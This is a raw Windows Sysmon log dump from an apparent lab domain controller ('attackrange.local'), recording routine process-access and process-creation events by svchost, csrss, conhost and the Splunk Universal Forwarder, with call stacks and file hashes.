13:36:36.827{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003810Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003809Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.827{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+64ab|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1807c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003808Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.833{59A5CD1D-8EE4-6005-C400-00000000A301}3508C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" check-licenseC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003807Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.796{59A5CD1D-8EE4-6005-C300-00000000A301}28963256C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003806Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.577{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003805Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.577{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003804Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.577{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003803Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003802Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003801Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003800Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003799Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003798Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003797Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003796Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003795Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8EE4-6005-C200-00000000A301}24882604C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1803d|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003794Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.575{59A5CD1D-8EE4-6005-C300-00000000A301}2896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" generate-sslC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000003793Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE4-6005-C200-00000000A301}2488C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003792Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003791Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003790Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003789Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003788Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003787Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003786Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003785Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:36.561{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003784Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 